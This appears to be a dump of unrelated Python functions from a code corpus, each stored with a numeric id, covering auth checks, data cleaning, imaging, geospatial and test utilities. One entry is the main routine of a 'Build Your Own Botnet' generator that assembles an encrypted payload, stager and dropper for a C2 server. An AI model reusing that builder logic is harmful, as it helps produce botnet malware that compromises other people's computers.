content
stringlengths
22
815k
id
int64
0
4.91M
async def validate_login(opp, provider, args): """Validate a login.""" try: provider.data.validate_login(args.username, args.password) print("Auth valid") except opp_auth.InvalidAuth: print("Auth invalid")
29,400
def call(stoptime, seconds, method=None): """ Returns a dict with route, direction, stop, call time and source. Call time is in UTC. """ result = dict(stoptime._asdict(), call_time=toutc(seconds), source=method or "I") result["deviation"] = result["call_time"] - stoptime.datetime return result
29,401
def sanitize_value(val): """Remove crap from val string and then convert it into float""" val = re.sub(u"(\xa0|\s)", '', val) val = val.replace(',', '.') # positive or negative multiplier mult = 1 if '-' in val and len(val) > 1: mult = -1 val = val.replace('-', '') elif '-' in val: val = '0' if val is not None: if '%' in val: val = float(val.replace('%', '')) return float(val) * mult
29,402
def getObjectInfo(fluiddb, about): """ Gets object info for an object with the given about tag. """ return fluiddb.about[about].get()
29,403
def extract_tar_images(): """extract tarfiles in data directory to image directory""" tarfiles = glob(os.path.join(data_directory, '*.tar.gz')) for t in tqdm(tarfiles): tf = tarfile.open(t) if not os.path.isdir(output_dir): os.makedirs(output_dir, exist_ok=True) tf.extractall(path=output_dir)
29,404
def __getattr__(name): """Get attribute.""" deprecated = __deprecated__.get(name) if deprecated: warnings.warn( "'{}' is deprecated. Use '{}' instead.".format(name, deprecated[0]), category=DeprecationWarning, stacklevel=(3 if PY37 else 4) ) return deprecated[1] raise AttributeError("module '{}' has no attribute '{}'".format(__name__, name))
29,405
def get_model_and_assets(): """Returns a tuple containing the model XML string and a dict of assets.""" return common.read_model('finger.xml'), common.ASSETS
29,406
def open_random_port(limit): """Open random ports.""" command = ''' netstat -plutn | grep "LISTEN" | grep -oh ":[0-9]*" | grep -v -e "^:$" | tr -d ":"''' ports_list = os.popen(command).read().split('\n')[:-1] ports_list = [int(i) for i in ports_list] for i in range(limit): port = False while True: port = randint(0, 65535) if port not in ports_list: break worker = Thread(target=listen_port, args=(q, port)) worker.setDaemon(True) worker.start() ports_list.append(port)
29,407
async def process_logout(): """ Purge the login information from the users session/cookie data :return: Redirect to main body """ # Simply destroy the cookies in this session and get rid of the creds, redirect to landing response = RedirectResponse("/") # Process the destruction from main app/test result response.delete_cookie("user") response.delete_cookie("flow") return response
29,408
def test_association(factory): """Testing Association elements in the meta-model.""" element = factory.create(UML.Association) property1 = factory.create(UML.Property) property2 = factory.create(UML.Property) element.memberEnd = property1 element.memberEnd = property2 element.ownedEnd = property1 element.navigableOwnedEnd = property1 assert ( not element.isDerived ), f"The isDerived property should default to False - {element.isDerived}" assert ( property1 in element.member ), f"Namespace.member does not contain memberEnd - {element.member}" assert ( property2 in element.member ), f"Namespace.member does not contain memberEnd - {element.member}" assert ( property1 in element.feature ), f"Classifier.feature does not contain ownedEnd - {element.feature}" assert ( property1 in element.ownedMember ), f"Namespace.ownedMember does not contain ownedEnd - {element.ownedEnd}" assert ( property1 in element.ownedEnd ), f"Association.ownedEnd does not contain navigableOwnedEnd - {element.ownedEnd}"
29,409
def _lex_label(label: str) -> _LexedLabel: """Splits the label into packages and target.""" match = _LABEL_LEXER.match(label) if match is None: raise ValueError(f'{label} is not an absolute Bazel label') groups = match.groupdict() packages: Optional[str] = groups['packages'] target: Optional[str] = groups['target'] if packages is None and target is None: raise ValueError(f'{label} cannot be empty') init = packages.split('/') if packages else [] last = target[1:] if target else init[-1] return init, last
29,410
def generate_extra(candidate: tuple, expansion_set, murder_list=None, attempted=None) -> list: """ Special routine for graph based algorithm :param candidate: :param expansion_set: :param murder_list: :param attempted: :return: """ check = manufacture_lambda(attempted, murder_list) accepted_sets = list() for regular_constraint in expansion_set: val = list(candidate) val.append(regular_constraint) future_child = tuple(sorted(val)) if check(future_child): accepted_sets.append(future_child) return accepted_sets
29,411
def extract_oe_stereochemistry( molecule: Molecule, oe_mol: "OEMol" ) -> Tuple[Dict[int, AtomStereochemistry], Dict[int, BondStereochemistry]]: """Extracts the CIP stereochemistry of each atom and bond in a OE molecule.""" atom_stereo = { oe_atom.GetIdx(): atom_cip_stereochemistry(oe_mol, oe_atom) for oe_atom in oe_mol.GetAtoms() } bond_stereo_tuples = { tuple( sorted([oe_bond.GetBgnIdx(), oe_bond.GetEndIdx()]) ): bond_cip_stereochemistry(oe_mol, oe_bond) for oe_bond in oe_mol.GetBonds() } bond_stereo = { i: bond_stereo_tuples[tuple(sorted([bond.atom1_index, bond.atom2_index]))] for i, bond in enumerate(molecule.bonds) } return atom_stereo, bond_stereo
29,412
def nlmeans_proxy(in_file, settings, snr=None, smask=None, nmask=None, out_file=None): """ Uses non-local means to denoise 4D datasets """ from dipy.denoise.nlmeans import nlmeans from scipy.ndimage.morphology import binary_erosion from scipy import ndimage if out_file is None: fname, fext = op.splitext(op.basename(in_file)) if fext == '.gz': fname, fext2 = op.splitext(fname) fext = fext2 + fext out_file = op.abspath('./%s_denoise%s' % (fname, fext)) img = nb.load(in_file) hdr = img.header data = img.get_data() aff = img.affine if data.ndim < 4: data = data[..., np.newaxis] data = np.nan_to_num(data) if data.max() < 1.0e-4: raise RuntimeError('There is no signal in the image') df = 1.0 if data.max() < 1000.0: df = 1000. / data.max() data *= df b0 = data[..., 0] if smask is None: smask = np.zeros_like(b0) smask[b0 > np.percentile(b0, 85.)] = 1 smask = binary_erosion( smask.astype(np.uint8), iterations=2).astype(np.uint8) if nmask is None: nmask = np.ones_like(b0, dtype=np.uint8) bmask = settings['mask'] if bmask is None: bmask = np.zeros_like(b0) bmask[b0 > np.percentile(b0[b0 > 0], 10)] = 1 label_im, nb_labels = ndimage.label(bmask) sizes = ndimage.sum(bmask, label_im, range(nb_labels + 1)) maxidx = np.argmax(sizes) bmask = np.zeros_like(b0, dtype=np.uint8) bmask[label_im == maxidx] = 1 nmask[bmask > 0] = 0 else: nmask = np.squeeze(nmask) nmask[nmask > 0.0] = 1 nmask[nmask < 1] = 0 nmask = nmask.astype(bool) nmask = binary_erosion(nmask, iterations=1).astype(np.uint8) den = np.zeros_like(data) est_snr = True if snr is not None: snr = [snr] * data.shape[-1] est_snr = False else: snr = [] for i in range(data.shape[-1]): d = data[..., i] if est_snr: s = np.mean(d[smask > 0]) n = np.std(d[nmask > 0]) snr.append(s / n) den[..., i] = nlmeans(d, snr[i], **settings) den = np.squeeze(den) den /= df nb.Nifti1Image(den.astype(hdr.get_data_dtype()), aff, hdr).to_filename(out_file) return out_file, snr
29,413
def dissolve( input_path: Union[str, 'os.PathLike[Any]'], output_path: Union[str, 'os.PathLike[Any]'], explodecollections: bool, groupby_columns: Optional[List[str]] = None, columns: Optional[List[str]] = [], aggfunc: str = 'first', tiles_path: Union[str, 'os.PathLike[Any]'] = None, nb_squarish_tiles: int = 1, clip_on_tiles: bool = True, input_layer: str = None, output_layer: str = None, nb_parallel: int = -1, verbose: bool = False, force: bool = False): """ Applies a dissolve operation on the geometry column of the input file. Only supports (Multi)Polygon files. If the output is tiled (by specifying a tiles_path or nb_squarish_tiles > 1), the result will be clipped on the output tiles and the tile borders are never crossed. Remarks: * only aggfunc = 'first' is supported at the moment. Args: input_path (PathLike): the input file output_path (PathLike): the file to write the result to explodecollections (bool): True to output only simple geometries. If False is specified, this can result in huge geometries for large files, so beware... groupby_columns (List[str], optional): columns to group on while aggregating. Defaults to None, resulting in a spatial union of all geometries that touch. columns (List[str], optional): columns to retain in the output file. The columns in parameter groupby_columns are always retained. The other columns specified are aggregated as specified in parameter aggfunc. If None is specified, all columns are retained. Defaults to [] (= only the groupby_columns are retained). aggfunc (str, optional): aggregation function to apply to columns not grouped on. Defaults to 'first'. tiles_path (PathLike, optional): a path to a geofile containing tiles. If specified, the output will be dissolved/unioned only within the tiles provided. Can be used to evade huge geometries being created if the input geometries are very interconnected. Defaults to None (= the output is not tiled). nb_squarish_tiles (int, optional): the approximate number of tiles the output should be dissolved/unioned to. If > 1, a tiling grid is automatically created based on the total bounds of the input file. The input geometries will be dissolved/unioned only within the tiles generated. Can be used to evade huge geometries being created if the input geometries are very interconnected. Defaults to 1 (= the output is not tiled). clip_on_tiles (bool, optional): deprecated: should always be True! If the output is tiled (by specifying a tiles_path or a nb_squarish_tiles > 1), the result will be clipped on the output tiles and the tile borders are never crossed. When False, a (scalable, fast) implementation always resulted in some geometries not being merged or in duplicates. Defaults to True. input_layer (str, optional): input layer name. Optional if the file only contains one layer. output_layer (str, optional): input layer name. Optional if the file only contains one layer. nb_parallel (int, optional): the number of parallel processes to use. If not specified, all available processors will be used. verbose (bool, optional): write more info to the output. Defaults to False. force (bool, optional): overwrite existing output file(s). Defaults to False. """ # Init if clip_on_tiles is False: logger.warn("The clip_on_tiles parameter is deprecated! It is ignored and always treated as True. When False, a fast implementation results in some geometries not being merged or in duplicates.") if tiles_path is not None or nb_squarish_tiles > 1: raise Exception("clip_on_tiles is deprecated, and the behaviour of clip_on_tiles is False is not supported anymore.") tiles_path_p = None if tiles_path is not None: tiles_path_p = Path(tiles_path) # If an empty list of geometry columns is passed, convert it to None to # simplify the rest of the code if groupby_columns is not None and len(groupby_columns) == 0: groupby_columns = None logger.info(f"Start dissolve on {input_path} to {output_path}") return geofileops_gpd.dissolve( input_path=Path(input_path), output_path=Path(output_path), explodecollections=explodecollections, groupby_columns=groupby_columns, columns=columns, aggfunc=aggfunc, tiles_path=tiles_path_p, nb_squarish_tiles=nb_squarish_tiles, input_layer=input_layer, output_layer=output_layer, nb_parallel=nb_parallel, verbose=verbose, force=force)
29,414
def jointImgTo3D(sample): """ Normalize sample to metric 3D :param sample: joints in (x,y,z) with x,y in image coordinates and z in mm :return: normalized joints in mm """ ret = np.zeros((3,), np.float32) # convert to metric using f ret[0] = (sample[0]-centerX)*sample[2]/focalLengthX ret[1] = (sample[1]-centerY)*sample[2]/focalLengthY ret[2] = sample[2] return ret
29,415
def _find_registered_loggers( source_logger: Logger, loggers: Set[str], filter_func: Callable[[Set[str]], List[logging.Logger]] ) -> List[logging.Logger]: """Filter root loggers based on provided parameters.""" root_loggers = filter_func(loggers) source_logger.debug(f"Filtered root loggers: {root_loggers}") return root_loggers
29,416
def build_param_obj(key, val, delim=''): """Creates a Parameter object from key and value, surrounding key with delim Parameters ---------- key : str * key to use for parameter value : str * value to use for parameter delim : str * str to surround key with when adding to parameter object Returns ------- param_obj : :class:`taniumpy.object_types.parameter.Parameter` * Parameter object built from key and val """ # create a parameter object param_obj = taniumpy.Parameter() param_obj.key = '{0}{1}{0}'.format(delim, key) param_obj.value = val return param_obj
29,417
def copy_fixtures_to_matrixstore(cls): """ Decorator for TestCase classes which copies data from Postgres into an in-memory MatrixStore instance. This allows us to re-use database fixtures, and the tests designed to work with those fixtures, to test MatrixStore-powered code. """ # These methods have been decorated with `@classmethod` so we need to use # `__func__` to get a reference to the original, undecorated method decorated_setUpClass = cls.setUpClass.__func__ decorated_tearDownClass = cls.tearDownClass.__func__ def setUpClass(inner_cls): decorated_setUpClass(inner_cls) matrixstore = matrixstore_from_postgres() stop_patching = patch_global_matrixstore(matrixstore) # Have to wrap this in a staticmethod decorator otherwise Python thinks # we're trying to create a new class method inner_cls._stop_patching = staticmethod(stop_patching) new_settings = override_settings( CACHES={ "default": {"BACKEND": "django.core.cache.backends.dummy.DummyCache"} } ) new_settings.enable() inner_cls._new_settings = new_settings def tearDownClass(inner_cls): inner_cls._stop_patching() inner_cls._new_settings.disable() decorated_tearDownClass(inner_cls) cls.setUpClass = classmethod(setUpClass) cls.tearDownClass = classmethod(tearDownClass) return cls
29,418
def test_ext_to_int_sample_map( map_mock, ): """ fetch method using a mocked API endpoint :param map_mock: :return: """ with open(LOOKUP_PED, 'r', encoding='utf-8') as handle: payload = json.load(handle) map_mock.return_value = payload result = ext_to_int_sample_map(project=PROJECT) assert isinstance(result, dict) assert result == { 'FAM1_father': ['CPG11'], 'FAM1_mother': ['CPG12'], 'FAM1_proband': ['CPG13'], 'FAM2_proband': ['CPG41'], }
29,419
def intersect_description(first, second): """ Intersect two description objects. :param first: First object to intersect with. :param second: Other object to intersect with. :return: New object. """ # Check that none of the object is None before processing if first is None: return second if second is None: return first if first.description_type == second.description_type: # Same MIME types, can merge content value = let_user_choose(first.value, second.value) description_type = first.description_type else: # MIME types are different, set MIME type to text description_type = 'text/enriched' value = """ Original MIME-type for first description: '{0}'. {1} ---- Original MIME-type for second description: '{2}'. {3} """.format(first.description_type, first.value, second.description_type, second.value) return Description(value, description_type)
29,420
def smooth_correlation_matrix(cor, sigma, exclude_diagonal=True): """Apply a simple gaussian filter on a correlation matrix. Parameters ---------- cor : numpy array Correlation matrix. sigma : int, optional Scale of the gaussian filter. exclude_diagonal : boolean, optional Whether to exclude the diagonal from the smoothing. That is what should be done generally because the diagonal is 1 by definition. Returns ------- cor_new : numpy array Smoothed correlation matrix. """ n_dim = len(np.diag(cor)) cor_new = np.copy(cor) if exclude_diagonal: cor_new[0, 0] = 0.5 * (cor[0, 1] + cor[1, 0]) cor_new[n_dim - 1, n_dim - 1] = 0.5 * (cor[n_dim - 1, n_dim - 2] + cor[n_dim - 2, n_dim - 1]) for i in range(1, n_dim - 1): cor_new[i, i] = 0.25 * (cor[i, i - 1] + cor[i, i + 1] + cor[i - 1, i] + cor[i + 1, i]) cor_new = gaussian_filter(cor_new, sigma, mode='nearest') if exclude_diagonal: for i in range(n_dim): cor_new[i, i] = cor[i, i] return cor_new
29,421
def quantize_iir_filter(filter_dict, n_bits): """ Quantize the iir filter tuple for sos_filt funcitons Parameters: - filter_dict: dict, contains the quantized filter dictionary with the following keys: - coeff: np.array(size=(M, 6)), float representation of the coefficients - coeff_scale: np.array(size=(M, 2)), scale all coefficients, not used here - coeff_shift: np.array(size=(M, 2), dtype=int), amount to shift during computation - y_scale: float, scale factor of the output, unused here - y_shift: int, number of bits to shift the output for scaling - n_bits: int, number of bits to represent the filter coefficients Returns: tuple: - a: np.array(size=(M+1, 3), dtype=int), quantized nominators - a_shift: np.array(size=(M+1), dtype=int), amount to shift during computation - b: np.array(size=(M+1, 3), dtype=int), quantized denumerators - b_shift: np.array(size=(M+1), dtype=int), amount to shift during computation - y_shift: int, amount to shift the output """ quant_coeff = filter_dict["coeff"] scale_coeff = filter_dict["coeff_scale"] comp_shift = filter_dict["coeff_shift"] output_shift = filter_dict["y_shift"] M = quant_coeff.shape[0] assert quant_coeff.shape == (M, 6) assert scale_coeff.shape == (M, 2) assert comp_shift.shape == (M, 2) assert comp_shift.dtype == int assert np.all(comp_shift <= 0) # generate the coefficients a = np.ones((M + 1, 3), dtype=int) << (n_bits - 1) b = np.ones((M + 1, 3), dtype=int) << (n_bits - 1) a_shift = np.ones((M + 1, ), dtype=int) * (n_bits - 1) b_shift = np.ones((M + 1, ), dtype=int) * (n_bits - 1) for m in range(M): a[m + 1, :] = quantize_to_int(quant_coeff[m, 3:], scale_coeff[m, 1], n_bits) b[m + 1, :] = quantize_to_int(quant_coeff[m, :3], scale_coeff[m, 0], n_bits) a_shift[m + 1] = -comp_shift[m, 1] b_shift[m + 1] = -comp_shift[m, 0] return a, a_shift, b, b_shift, output_shift
29,422
def add_goods(request, openid, store_id, store_name, dsr, specification, brand, favorable_rate, pic_path, live_recording_screen_path, daily_price, commission_rate, pos_price, preferential_way, goods_url, hand_card, storage_condition, shelf_life, unsuitable_people, ability_to_deliver, shipping_cycle, shipping_addresses, delivery_company, not_shipping): """ :request method: POST 商铺信息 :param store_id: 店铺id(最长45位) :param store_name: 店铺id(最长45位) :param dsr: 店铺评分 商品信息 :param goods_name: 商品名称 :param specification: 规格 :param brand: 商品品牌 :param favorable_rate: 好评率 :param pic_path: 商品主图链接(列表) :param live_recording_screen_path: 知名主播带货视频链接 :param daily_price: 日常价格 :param live_price: 直播价格 :param commission_rate: 直播佣金比例 :param pos_price: 坑位费预算 :param preferential_way: 直播活动机制 :param goods_url: 商品链接 :param hand_card: 直播手卡 全网比价 :param tmall_price: 天猫价格 :param taobao_price: 淘宝价格 :param jd_price: 京东 :param pdd_price: 拼多多 :param offline_price: 线下商超 存储与运输 :param storage_condition: 存储条件 :param shelf_life: 保质期 :param unsuitable_people: 不适用人群 :param ability_to_deliver: 发货能力 :param shipping_cycle: 发货周期 :param shipping_addresses: 发货地址 :param delivery_company: 物流快递公司 :param not_shipping: 不发货区域 :param free_shipping: 包邮地区 其他 :param comment: 备注信息 :return: {'code': ResponsCode.FAILED, 'data': '', "msg": '添加商品失败'} {'code': ResponsCode.SUCCESS, 'data': {"goods_id": pk}, "msg": '添加商品成功'} {'code': ResponsCode.EXCEPTION, 'data': '', "msg": '添加商品异常'} """ rsp = {'code': ResponsCode.FAILED, 'data': '', "msg": '添加商品失败'} try: _, data = get_store_data_by_store_id(openid, store_id) if not data: is_success = insert_store_info(store_id, store_name, dsr, openid, ignore=True) if not is_success: raise InvalidParameter('店铺不存在,且新建失败') is_success, pk = insert_goods_data(openid, json.loads(request.body)) if is_success: rsp = {'code': ResponsCode.SUCCESS, 'data': {"goods_id": pk}, "msg": '添加商品成功'} except InvalidParameter as e: rsp = {'code': ResponsCode.FAILED, 'data': '', "msg": str(e)} except: logger.exception(traceback.format_exc()) rsp = {'code': ResponsCode.EXCEPTION, 'data': '', "msg": '添加商品异常'} finally: return rsp
29,423
def cli_to_args(): """ converts the command line interface to a series of args """ cli = argparse.ArgumentParser(description="") cli.add_argument('-input_dir', type=str, required=True, help='The input directory that contains pngs and svgs of cowboys with Unicode names') cli.add_argument('-output_dir', type=str, required=True, help='The output diectory where we will put pngs and svgs of cowboys with plain english names. Yee haw.') return cli.parse_args()
29,424
def main(): """ Run the generator """ util.display(globals()['__banner'], color=random.choice(list(filter(lambda x: bool(str.isupper(x) and 'BLACK' not in x), dir(colorama.Fore)))), style='normal') parser = argparse.ArgumentParser( prog='client.py', description="Generator (Build Your Own Botnet)" ) parser.add_argument('host', action='store', type=str, help='server IP address') parser.add_argument('port', action='store', type=str, help='server port number') parser.add_argument('modules', metavar='module', action='append', nargs='*', help='module(s) to remotely import at run-time') parser.add_argument('--name', action='store', help='output file name') parser.add_argument('--icon', action='store', help='icon image file name') parser.add_argument('--pastebin', action='store', metavar='API', help='upload the payload to Pastebin (instead of the C2 server hosting it)') parser.add_argument('--encrypt', action='store_true', help='encrypt the payload with a random 128-bit key embedded in the payload\'s stager', default=False) parser.add_argument('--compress', action='store_true', help='zip-compress into a self-extracting python script', default=False) parser.add_argument('--freeze', action='store_true', help='compile client into a standalone executable for the current host platform', default=False) parser.add_argument('--debug', action='store_true', help='enable debugging output for frozen executables', default=False ) parser.add_argument( '-v', '--version', action='version', version='0.5', ) options = parser.parse_args() key = base64.b64encode(os.urandom(16)) var = generators.variable(3) modules = _modules(options, var=var, key=key) imports = _imports(options, var=var, key=key, modules=modules) hidden = _hidden (options, var=var, key=key, modules=modules, imports=imports) payload = _payload(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden) stager = _stager (options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=payload) dropper = _dropper(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=stager) return dropper
29,425
def _get_metadata_from_configuration( path, name, config, fields, **kwargs ): """Recursively get metadata from configuration. Args: path: used to indicate the path to the root element. mainly for trouble shooting. name: the key of the metadata section. config: the value of the metadata section. fields: all fields defined in os fields or package fields dir. """ if not isinstance(config, dict): raise exception.InvalidParameter( '%s config %s is not dict' % (path, config) ) metadata_self = config.get('_self', {}) if 'field' in metadata_self: field_name = metadata_self['field'] field = fields[field_name] else: field = {} # mapping to may contain $ like $partition. Here we replace the # $partition to the key of the correspendent config. The backend then # can use this kind of feature to support multi partitions when we # only declare the partition metadata in one place. mapping_to_template = metadata_self.get('mapping_to', None) if mapping_to_template: mapping_to = string.Template( mapping_to_template ).safe_substitute( **kwargs ) else: mapping_to = None self_metadata = { 'name': name, 'display_name': metadata_self.get('display_name', name), 'field_type': field.get('field_type', dict), 'display_type': field.get('display_type', None), 'description': metadata_self.get( 'description', field.get('description', None) ), 'is_required': metadata_self.get('is_required', False), 'required_in_whole_config': metadata_self.get( 'required_in_whole_config', False), 'mapping_to': mapping_to, 'validator': metadata_self.get( 'validator', field.get('validator', None) ), 'js_validator': metadata_self.get( 'js_validator', field.get('js_validator', None) ), 'default_value': metadata_self.get('default_value', None), 'default_callback': metadata_self.get('default_callback', None), 'default_callback_params': metadata_self.get( 'default_callback_params', {}), 'options': metadata_self.get('options', None), 'options_callback': metadata_self.get('options_callback', None), 'options_callback_params': metadata_self.get( 'options_callback_params', {}), 'autofill_callback': metadata_self.get( 'autofill_callback', None), 'autofill_callback_params': metadata_self.get( 'autofill_callback_params', {}), 'required_in_options': metadata_self.get( 'required_in_options', False) } self_metadata.update(kwargs) metadata = {'_self': self_metadata} # Key extension used to do two things: # one is to return the extended metadata that $<something> # will be replace to possible extensions. # The other is to record the $<something> to extended value # and used in future mapping_to subsititution. # TODO(grace): select proper name instead of key_extensions if # you think it is better. # Suppose key_extension is {'$partition': ['/var', '/']} for $partition # the metadata for $partition will be mapped to { # '/var': ..., '/': ...} and kwargs={'partition': '/var'} and # kwargs={'partition': '/'} will be parsed to recursive metadata parsing # for sub metadata under '/var' and '/'. Then in the metadata parsing # for the sub metadata, this kwargs will be used to substitute mapping_to. key_extensions = metadata_self.get('key_extensions', {}) general_keys = [] for key, value in config.items(): if key.startswith('_'): continue if key in key_extensions: if not key.startswith('$'): raise exception.InvalidParameter( '%s subkey %s should start with $' % ( path, key ) ) extended_keys = key_extensions[key] for extended_key in extended_keys: if extended_key.startswith('$'): raise exception.InvalidParameter( '%s extended key %s should not start with $' % ( path, extended_key ) ) sub_kwargs = dict(kwargs) sub_kwargs[key[1:]] = extended_key metadata[extended_key] = _get_metadata_from_configuration( '%s/%s' % (path, extended_key), extended_key, value, fields, **sub_kwargs ) else: if key.startswith('$'): general_keys.append(key) metadata[key] = _get_metadata_from_configuration( '%s/%s' % (path, key), key, value, fields, **kwargs ) if len(general_keys) > 1: raise exception.InvalidParameter( 'foud multi general keys in %s: %s' % ( path, general_keys ) ) return metadata
29,426
def test_get_events(lora): """Test _get_events.""" # Successful command lora._serial.receive.return_value = [ 'at+recv=0,-68,7,0', 'at+recv=1,-65,6,2:4865', ] events = lora._get_events() assert events.pop() == '1,-65,6,2:4865' assert events.pop() == '0,-68,7,0'
29,427
def calcOneFeatureEa(dataSet: list, feature_idx: int): """ 获取一个特征的E(A)值 :param dataSet: 数据集 :param feature_idx: 指定的一个特征(这里是用下标0,1,2..表示) :return: """ attrs = getOneFeatureAttrs(dataSet, feature_idx) # 获取数据集的p, n值 p, n = getDatasetPN(dataSet) ea = 0.0 for attr in attrs: # 获取每个属性值对应的p, n值 attrP, attrN = getOneFeatureAttrPN(dataSet, feature_idx, attr) # 计算属性对应的ipn attrIPN = calcIpn(attrP, attrN) ea += (attrP+attrN)/(p+n) * attrIPN return ea
29,428
def translate_mapping(mapping: list, reference: SimpleNamespace, templ: bool=True, nontempl: bool=True, correctframe: bool=True, filterframe: bool=True, filternonsense: bool=True): """ creates a protein mapping from a dna mapping. :param mapping: a list/tuple of ops. :param reference: the reference object to which the mapping is relative. :param templ: include templated ops :param nontempl: include nontemplated ops :param correctframe: removes isolated ops that disrupt the frame :param filterframe: don't return a mapping if there are remaining frameshifts. :param filternonsense: don't return a mapping if contains a stop codon :return: """ # create a mapping with the appropriate SNPs base_mapping = [] if templ: base_mapping.extend(templated(mapping, reference)) if nontempl: base_mapping.extend(nontemplated(mapping, reference)) base_mapping.sort(key=lambda x: x[0]) # correct errors if correctframe: base_mapping = error_scrub(base_mapping) # filter for whether it is in frame or not. if filterframe and not len(transform(reference.seq, base_mapping)) % 3 == len(reference.seq) % 3: return [] protein = translate(transform(reference.seq, base_mapping), offset=reference.offset) if filternonsense and "_" in protein: return [] protein_alns = align_proteins(reference.protein, protein) return protein_alns
29,429
def try_download_file(): """ Function that try to download required files from github (pcm-dpc/COVID-19) If some errors happen during download, like "connection lost", it waits for 5 seconds. Print info about error in case no internet connection don't :return: """ connection = True while connection: try: download_file( "https://raw.githubusercontent.com/pcm-dpc/COVID-19/master/dati-json/dpc-covid19-ita" "-andamento-nazionale.json", "national.json", "data") download_file( "https://raw.githubusercontent.com/pcm-dpc/COVID-19/master/dati-json/dpc-covid19-ita-regioni" ".json", "regional.json", "data") connection = False except urllib.error.URLError: print("[i] No connection with Host... retry in 5 seconds") connection = True time.sleep(5)
29,430
def trainModel(label,bestModel,obs,trainSet,testSet,modelgrid,cv,optMetric='auc'): """ Train a message classification model """ from copy import copy from numpy import zeros, unique from itertools import product pred = zeros(len(obs)) fullpred = zeros((len(obs),len(unique(obs)))) model = copy(bestModel.model) #find the best model via tuning grid for tune in [dict(zip(modelgrid, v)) for v in product(*modelgrid.values())]: for k in tune.keys(): setattr(model,k,tune[k]) i = 0 for tr, vl in cv: model.fit(trainSet.ix[tr].values,obs[tr]) pred[vl] = model.predict_proba(trainSet.ix[vl].values)[:,1] fullpred[vl,:] = model.predict_proba(trainSet.ix[vl].values) i += 1 bestModel.updateModel(pred,fullpred,obs,model,trainSet.columns.values,tune,optMetric=optMetric) #re-train with all training data bestModel.model.fit(trainSet.values,obs) print bestModel return {label: {'pred': pred, 'test_pred':bestModel.model.predict_proba(testSet)[:,1]}}
29,431
def get_device_state(): """Return the device status.""" state_cmd = get_adb_command_line('get-state') return execute_command( state_cmd, timeout=RECOVERY_CMD_TIMEOUT, log_error=True)
29,432
def character_state(combat, character): """ Get the combat status of a single character, as a tuple of current_hp, max_hp, total healing """ max_hp = Max_hp(character.base_hp) total_h = 0 for effect in StatusEffect.objects.filter(character=character, combat=combat, effect_typ__typ='MAX_HP'): max_hp.hp += effect.effect_val current_hp = Current_hp(max_hp.hp) for wound in Wound.objects.filter(character=character, combat=combat): current_hp.hp -= wound.amount for heal in Heal.objects.filter(character=character, combat=combat): current_hp.hp += heal.amount total_h += heal.amount return current_hp, max_hp, total_h
29,433
def load_textfile(path) : """Returns text file as a str object """ f=open(path, 'r') recs = f.read() # f.readlines() f.close() return recs
29,434
def interp1d_to_uniform(x, y, axis=None): """Resample array to uniformly sampled axis. Has some limitations due to use of scipy interp1d. Args: x (vector): independent variable y (array): dependent variable, must broadcast with x axis (int): axis along which to resample Returns: xu: uniformly spaced independent variable yu: dependent resampled at xu """ x = np.asarray(x) y = np.asarray(y) if axis is None: axis = mathx.vector_dim(x) num = x.shape[axis] mn = x.min(axis, keepdims=True) mx = x.max(axis, keepdims=True) # Limitation of scipy interp1d x = x.squeeze() mn = mn.squeeze() mx = mx.squeeze() assert x.ndim == 1 xu = np.arange(num)/(num - 1)*(mx - mn) + mn yu = scipy.interpolate.interp1d(x.squeeze(), y, axis=axis, bounds_error=False)(xu) return mathx.reshape_vec(xu, axis), yu
29,435
def get_walkthrought_dir(dm_path): """ return 3 parameter: file_index[0]: total path infomation file_index[1]: file path directory file_index[2]: file name """ file_index = [] for dirPath, dirName, fileName in os.walk(dm_path): for file in fileName: path_info = [os.path.join(dirPath, file), dirPath, file] file_index.append(path_info) return file_index
29,436
def flatten_dict(d: Dict): """Recursively flatten dictionaries, ordered by keys in ascending order""" s = "" for k in sorted(d.keys()): if d[k] is not None: if isinstance(d[k], dict): s += f"{k}|{flatten_dict(d[k])}|" else: s += f"{k}|{d[k]}|" return s
29,437
def get_tokens(s): """ Given a string containing xonsh code, generates a stream of relevant PLY tokens using ``handle_token``. """ state = {'indents': [0], 'last': None, 'pymode': [(True, '', '', (0, 0))], 'stream': tokenize(io.BytesIO(s.encode('utf-8')).readline)} while True: try: token = next(state['stream']) yield from handle_token(state, token) except StopIteration: if len(state['pymode']) > 1: pm, o, m, p = state['pymode'][-1] l, c = p e = 'Unmatched "{}" at line {}, column {}' yield _new_token('ERRORTOKEN', e.format(o, l, c), (0, 0)) break except TokenError as e: # this is recoverable in single-line mode (from the shell) # (e.g., EOF while scanning string literal) yield _new_token('ERRORTOKEN', e.args[0], (0, 0)) break except IndentationError as e: # this is never recoverable yield _new_token('ERRORTOKEN', e, (0, 0)) break
29,438
def getPVvecs(fname): """ Generates an ensemble of day long PV activities, sampled 3 different days for each complete pv data set """ datmat = np.zeros((18,48)) df = dd.read_csv(fname) i = 0 for unique_value in df.Substation.unique(): ttemp, ptemp = PVgettimesandpower("2014-06", unique_value, fname) t, p = trimandshift(ttemp, ptemp) datmat[i,:] = np.array(p) i += 1 ttemp, ptemp = PVgettimesandpower("2014-07", unique_value, fname) t, p = trimandshift(ttemp, ptemp) datmat[i,:] = np.array(p) i += 1 ttemp, ptemp = PVgettimesandpower("2014-08", unique_value, fname) t, p = trimandshift(ttemp, ptemp) datmat[i,:] = np.array(p) i += 1 return datmat
29,439
def test_fqdn_url_without_domain_name(): """ Test with invalid fully qualified domain name URL """ schema = Schema({"url": FqdnUrl()}) try: schema({"url": "http://localhost/"}) except MultipleInvalid as e: assert_equal(str(e), "expected a fully qualified domain name URL for dictionary value @ data['url']") else: assert False, "Did not raise Invalid for None URL"
29,440
def vis9(n): # DONE """ O OO OOO OO OOO OOOO OOO OOOO OOOOO Number of Os: 6 9 12""" result = 'O' * (n - 1) + 'O\n' result += 'O' * (n - 1) + 'OO\n' result += 'O' * (n - 1) + 'OOO\n' return result
29,441
def derivative_circ_dist(x, p): """ Derivative of circumferential distance and derivative function, w.r.t. p d/dp d(x, p) = d/dp min_{z in [-1, 0, 1]} (|z + p - x|) Args: x (float): first angle p (float): second angle Returns: float: d/dp d(x, p) """ # pylint: disable=chained-comparison,misplaced-comparison-constant t = p - x if t < -0.5 or (0 < t and t < 0.5): return -1 if t > 0.5 or (-0.5 < t and t < 0): return 1 return 0
29,442
